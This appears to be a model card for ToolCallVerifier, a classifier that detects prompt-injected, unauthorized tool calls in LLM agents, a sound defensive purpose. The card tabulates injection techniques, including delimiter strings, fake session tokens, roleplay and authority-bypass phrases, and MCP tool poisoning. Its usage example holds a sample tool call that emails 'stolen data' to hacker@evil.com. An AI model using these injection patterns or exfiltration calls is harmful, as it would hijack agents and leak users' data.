	---
	language:
	- en
	license: apache-2.0
	library_name: transformers
	tags:
	- modernbert
	- security
	- jailbreak-detection
	- prompt-injection
	- token-classification
	- tool-calling
	- llm-safety
	- mcp
	datasets:
	- microsoft/llmail-inject-challenge
	- allenai/wildjailbreak
	- hackaprompt/hackaprompt-dataset
	- JailbreakBench/JBB-Behaviors
	base_model: answerdotai/ModernBERT-base
	pipeline_tag: token-classification
	model-index:
	- name: tool-call-verifier
	  results:
	  - task:
	      type: token-classification
	      name: Unauthorized Tool Call Detection
	    metrics:
	    - name: UNAUTHORIZED F1
	      type: f1
	      value: 0.9350
	    - name: UNAUTHORIZED Precision
	      type: precision
	      value: 0.9501
	    - name: UNAUTHORIZED Recall
	      type: recall
	      value: 0.9205
	    - name: Accuracy
	      type: accuracy
	      value: 0.9288
	---

	# ToolCallVerifier - Unauthorized Tool Call Detection

	<div align="center">

	[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
	[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
	[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)

	Stage 2 of Two-Stage LLM Agent Defense Pipeline

	</div>

	---

	## 🎯 What This Model Does

	ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

	| Label | Description |
	|-------|-------------|
	| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
	| `UNAUTHORIZED` | Token indicates injected/malicious content: BLOCK |

	---

	## 📊 Performance

	| Metric | Value |
	|--------|-------|
	| UNAUTHORIZED F1 | 93.50% |
	| UNAUTHORIZED Precision | 95.01% |
	| UNAUTHORIZED Recall | 92.05% |
	| Overall Accuracy | 92.88% |

	### Confusion Matrix (Token-Level)

	```
	                    Predicted
	                 AUTH      UNAUTH
	Actual AUTH      130,708     8,483
	       UNAUTH     13,924   161,031
	```
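
The headline metrics can be re-derived from the confusion matrix by treating UNAUTHORIZED as the positive class. The sketch below does that arithmetic; the variable names are illustrative. The results agree with the reported table to within roughly 0.02 percentage points, a gap that presumably comes from rounding in the published figures.

```python
# Token-level confusion matrix from this model card,
# with UNAUTHORIZED treated as the positive class.
tn, fp = 130_708, 8_483    # actual AUTHORIZED: predicted AUTH, predicted UNAUTH
fn, tp = 13_924, 161_031   # actual UNAUTHORIZED: predicted AUTH, predicted UNAUTH

precision = tp / (tp + fp)                      # share of flagged tokens that were truly unauthorized
recall = tp / (tp + fn)                         # share of unauthorized tokens that were flagged
f1 = 2 * precision * recall / (precision + recall)
accuracy = (tp + tn) / (tp + tn + fp + fn)      # share of all tokens labelled correctly

for name, value in [
    ("precision", precision),
    ("recall", recall),
    ("f1", f1),
    ("accuracy", accuracy),
]:
    print(f"{name}: {value:.4f}")
```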

	---

	## 🗂️ Training Data

	Trained on ~30,000 samples combining real-world attacks and synthetic patterns:

	### HuggingFace Datasets

	| Dataset | Description | Samples |
	|---------|-------------|---------|
	| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
	| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
	| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
	| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |

	### Synthetic Attack Generators

	| Generator | Description |
	|-----------|-------------|
	| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
	| Filesystem | File/directory operation attacks |
	| Network | Network/API exfiltration attacks |
	| Email | Email tool hijacking |
	| Financial | Transaction manipulation |
	| Code Execution | Code injection attacks |
	| Authentication | Access control bypass |
	| MCP Attacks | Tool poisoning, shadowing, rug pulls |

	---

	## 🚨 Attack Categories Covered

	| Category | Source | Description |
	|----------|--------|-------------|
	| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
	| Word Obfuscation | LLMail | Inserting noise words between tokens |
	| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
	| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
	| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
	| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
	| Intent Mismatch | Synthetic | User asks X, tool does Y |
	| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
	| MCP Shadowing | Synthetic | Fake authorization context |
	---

	## 💻 Usage

	```python
	from transformers import AutoTokenizer, AutoModelForTokenClassification
	import torch

	model_name = "rootfs/tool-call-verifier"
	tokenizer = AutoTokenizer.from_pretrained(model_name)
	model = AutoModelForTokenClassification.from_pretrained(model_name)

	# Example: Verify a tool call
	user_intent = "Summarize my emails"
	tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

	# Combine for classification
	input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
	inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

	# Run inference without tracking gradients
	with torch.no_grad():
	    outputs = model(**inputs)
	    predictions = torch.argmax(outputs.logits, dim=-1)

	# Map each predicted class id back to its label, one per input token
	id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
	tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
	labels = [id2label[p.item()] for p in predictions[0]]

	# Check for unauthorized tokens
	unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
	if unauthorized_tokens:
	    print("⚠️ BLOCKED: Unauthorized tool call detected!")
	    print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
	else:
	    print("✅ Tool call authorized")
	```
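
The usage snippet blocks a call as soon as any token is labelled `UNAUTHORIZED`, special tokens included. Some deployments may prefer to skip special tokens and tolerate a small fraction of flagged tokens before blocking. The helper below is a hypothetical sketch of that reduction, not part of the released model: `decide`, `max_unauthorized_ratio`, and the special-token set are all assumptions to adapt to your tokenizer and risk tolerance.

```python
from typing import FrozenSet, List, Sequence, Tuple

# Assumption: special tokens added by the tokenizer; adjust to match yours.
SPECIAL_TOKENS: FrozenSet[str] = frozenset({"[CLS]", "[SEP]", "[PAD]"})


def decide(
    tokens: Sequence[str],
    labels: Sequence[str],
    max_unauthorized_ratio: float = 0.0,
    special_tokens: FrozenSet[str] = SPECIAL_TOKENS,
) -> Tuple[bool, List[str]]:
    """Reduce token-level labels to (blocked, flagged_tokens).

    With the default ratio of 0.0, a single flagged non-special token blocks the call.
    """
    # Ignore special tokens, which carry no tool-call content.
    scored = [(t, l) for t, l in zip(tokens, labels) if t not in special_tokens]
    flagged = [t for t, l in scored if l == "UNAUTHORIZED"]
    ratio = len(flagged) / len(scored) if scored else 0.0
    return ratio > max_unauthorized_ratio, flagged


# Example with hand-written tokens and labels (not real model output).
example_tokens = ["[CLS]", "send", "_email", "hacker", "[SEP]"]
example_labels = ["UNAUTHORIZED", "AUTHORIZED", "AUTHORIZED", "UNAUTHORIZED", "AUTHORIZED"]
blocked, flagged = decide(example_tokens, example_labels)
print(blocked, flagged)
```

A stricter default (block on any flagged token) fits the binary, decisive design described in this card; raising the ratio trades recall for fewer false blocks.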

	---

	## ⚙️ Training Configuration

	| Parameter | Value |
	|-----------|-------|
	| Base Model | `answerdotai/ModernBERT-base` |
	| Max Length | 512 tokens |
	| Batch Size | 32 |
	| Epochs | 5 |
	| Learning Rate | 3e-5 |
	| Loss | CrossEntropyLoss (class-weighted) |
	| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
	| Attention | SDPA (Flash Attention) |
	| Hardware | AMD Instinct MI300X (ROCm) |
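
Class weights of `[0.5, 3.0]` make an error on an `UNAUTHORIZED` token cost six times as much as the same error on an `AUTHORIZED` token. The sketch below shows that arithmetic in plain Python, assuming the weighted-mean reduction that PyTorch's `CrossEntropyLoss(weight=...)` applies by default. The training code itself is not shown in this card, and the function name is illustrative.

```python
import math
from typing import Sequence

CLASS_WEIGHTS = [0.5, 3.0]  # (AUTHORIZED, UNAUTHORIZED), as listed in the table


def weighted_cross_entropy(
    logits: Sequence[Sequence[float]],
    targets: Sequence[int],
    weights: Sequence[float] = CLASS_WEIGHTS,
) -> float:
    """Weighted-mean cross-entropy over tokens.

    logits: one [score_authorized, score_unauthorized] pair per token
    targets: one class index (0 or 1) per token
    """
    total_loss = 0.0
    total_weight = 0.0
    for scores, target in zip(logits, targets):
        # Numerically stable log-sum-exp, then negative log-likelihood of the target.
        peak = max(scores)
        log_norm = peak + math.log(sum(math.exp(s - peak) for s in scores))
        nll = log_norm - scores[target]
        total_loss += weights[target] * nll
        total_weight += weights[target]
    # Normalize by the summed weights of the targets, not by the token count.
    return total_loss / total_weight


# One AUTHORIZED token with an undecided prediction, and one UNAUTHORIZED
# token that the model confidently (and wrongly) scores as AUTHORIZED.
loss = weighted_cross_entropy([[0.0, 0.0], [5.0, 0.0]], [0, 1])
print(f"{loss:.4f}")
```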

	---

	## 🔗 Integration with FunctionCallSentinel

	This model is Stage 2 of a two-stage defense pipeline:

	```
	┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
	│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
	│                 │     │      (Stage 1)       │     │                 │
	└─────────────────┘     └──────────────────────┘     └────────┬────────┘
	                                                              │
	                               ┌──────────────────────────────▼──────────────────────────┐
	                               │              ToolCallVerifier (This Model)              │
	                               │     Token-level verification before tool execution      │
	                               └─────────────────────────────────────────────────────────┘
	```

	| Scenario | Recommendation |
	|----------|----------------|
	| General chatbot | Stage 1 only |
	| Tool-calling agent (low risk) | Stage 1 only |
	| Tool-calling agent (high risk) | Both stages |
	| Email/file system access | Both stages |
	| Financial transactions | Both stages |
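
The two-stage flow and the recommendations in the table can be sketched as a small orchestration function. Everything here is hypothetical glue code: the three callables stand in for FunctionCallSentinel, the LLM, and ToolCallVerifier, and `high_risk` is an assumed flag for choosing between "Stage 1 only" and "Both stages".

```python
from typing import Callable, Optional


def run_guarded_tool_call(
    user_prompt: str,
    stage1_is_safe: Callable[[str], bool],
    propose_tool_call: Callable[[str], str],
    stage2_is_authorized: Callable[[str, str], bool],
    high_risk: bool = True,
) -> Optional[str]:
    """Return the proposed tool call (JSON string) if it passes the enabled checks, else None."""
    # Stage 1: screen the user prompt before it reaches the LLM.
    if not stage1_is_safe(user_prompt):
        return None
    # The LLM proposes a tool call for the prompt.
    tool_call = propose_tool_call(user_prompt)
    # Stage 2: verify the proposed call before execution (high-risk setups only).
    if high_risk and not stage2_is_authorized(user_prompt, tool_call):
        return None
    return tool_call


# Stub callables for illustration; real ones would wrap the two models and the LLM.
proposed = '{"name": "send_email", "arguments": {"to": "hacker@evil.com"}}'
result = run_guarded_tool_call(
    "Summarize my emails",
    stage1_is_safe=lambda prompt: True,
    propose_tool_call=lambda prompt: proposed,
    stage2_is_authorized=lambda prompt, call: False,
)
print(result)
```

Returning `None` rather than raising keeps the caller in charge of how a blocked call is reported to the user.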

	---

	## 🎯 Intended Use

	### Primary Use Cases
	- LLM Agent Security: Verify tool calls before execution
	- Prompt Injection Defense: Detect unauthorized actions from injected prompts
	- API Gateway Protection: Filter malicious tool calls at infrastructure level

	### Out of Scope
	- General text classification
	- Non-tool-calling scenarios
	- Languages other than English

	---

	## ⚠️ Limitations

	1. Tool schema dependent: performs best when the tool schema is included in the input
	2. English only: not tested on other languages
	3. Binary classification: there is no intermediate "suspicious" category (by design, for decisiveness)

	---

	## 📜 License

	Apache 2.0

	---

	## 🔗 Links

	- Stage 1 Model: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)